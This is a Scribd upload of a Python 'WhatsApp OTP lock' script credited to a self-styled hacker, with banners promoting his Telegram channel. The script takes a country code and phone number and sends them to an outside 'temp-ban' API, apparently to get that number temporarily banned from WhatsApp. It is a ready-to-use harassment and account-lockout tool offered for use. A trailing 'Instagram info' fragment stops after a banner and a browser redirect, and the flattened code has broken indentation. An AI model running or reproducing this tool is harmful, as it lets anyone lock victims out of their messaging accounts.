0% found this document useful (0 votes)
20 views2 pages

Whatsappotplockek - Deepu Python

WhatsApp lock optp python script

Uploaded by

walikhelne533
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
20 views2 pages

Whatsappotplockek - Deepu Python

WhatsApp lock optp python script

Uploaded by

walikhelne533
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

import requests

import os
import time
from rich import print

# Banner function with animated colorful text effect


def otp_lock_banner():
os.system("cls" if os.name == "nt" else "clear")

# Animated colorful text effect


colors = ["red", "yellow", "green", "cyan", "blue", "magenta"]
for color in colors:
os.system("cls" if os.name == "nt" else "clear")

print(f'''
[bold {color}]●[bold {colors[(colors.index(color) + 1) % len(colors)]}] ●[bold
{colors[(colors.index(color) + 2) % len(colors)]}] ●
.---. .-----------
/ \ __ / ------
/ / \( )/ -----
////// ' \/ ` ---
//// / // : : ---
// / / /` '--
// //..\\\

====UU====UU====
'//||\\`
[bold white]======================================
[bold white][[bold red]^[bold white]] [bold green] Author: DEEPAK [HACKING__MASTER]
\n[bold white][[bold red]^[bold white]] [bold green] Github: LOADING..... \n[bold
white][[bold red]^[bold white]] [bold green] Telegram:
https://t.me/hackingmaster009
[bold white]====================================== ''')

time.sleep(0.5)

print('''[bold white]======================================
[bold white][[bold red]^[bold white]] [bold green] Author: DEEPAK [HACKING__MASTER]
[bold white][[bold red]^[bold white]] [bold green] Github: LOADING..... [bold
white][[bold red]^[bold white]] [bold green] Telegram:https://t.me/hackingmaster009
[bold white]====================================== ''')

# API function
def temp_ban_api(country_code, phone_number):
try:
api_url = f"https://api-bruxiintk.online/api/temp-ban?
apikey=bx&ddi={country_code}&numero={phone_number}"
response = requests.get(api_url)
response.raise_for_status() # Raise an exception for HTTP errors
if response.status_code == 200:
return "\n[bold green] [94m[✓]Successfully done\n [bold
green]Completed..!!\n\n[bold green]Thank You For Use My Script!!\n Created DEEPAK
[HACKING__MASTER]\n"

else:
return "Not done"
except requests.exceptions.RequestException as e:
return f"Error: {e}"
# Main function
def main():
otp_lock_banner() # Display OTP Lock banner
country_code = input("\n\033[90m[\033[91m?\033[90m]] \033[92m[?]Enter Your
Country Code(ex..+91) " '\n └─> ')
if not country_code.startswith("+"):
country_code = "+" + country_code

phone_number = input("\n\033[90m[\033[91m?\033[90m]] \033[92m[?]Enter Your


Mobile Number " '\n └─> ')
phone_number = phone_number.replace(" ", "") # Remove spaces

result = temp_ban_api(country_code, phone_number)


print(result)

if __name__ == "__main__":
main()

import requests
import os
import time
import sys
import webbrowser
from fake_useragent import UserAgent

E = '\033[1;31m'
B = '\033[2;36m'
G = '\033[1;32m'
S = '\033[1;33m'
F = '\033[1;32m' # اخضر
B = "\033[1;30m" # Black
R = "\033[1;31m" # Red
G = "\033[1;32m" # Green
Y = "\033[1;33m" # Yellow
Bl = "\033[1;34m" # Blue
P = "\033[1;35m" # Purple
C = "\033[1;36m" # Cyan
W = "\033[1;37m" # White
PN = "\033[1;35m" # PINK

def to(s):
for char in s + "\n":
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(23.0 / 8000)

to(
f"""{G}|{C}=============================================={G}|
{G}| Creator : DEEPAK [HACKING__MASTER] {G} |
{G}| {Y}Tools : Instagram info{G} |
{G}| {PN}Expire : LIFETIME {G} |
{G}| {W}Link : https://t.me/hackingmaster009{G} |
{G}|{C}=============================================={G}|"""
)

webbrowser.open("https://t.me/hackingmaster009")

You might also like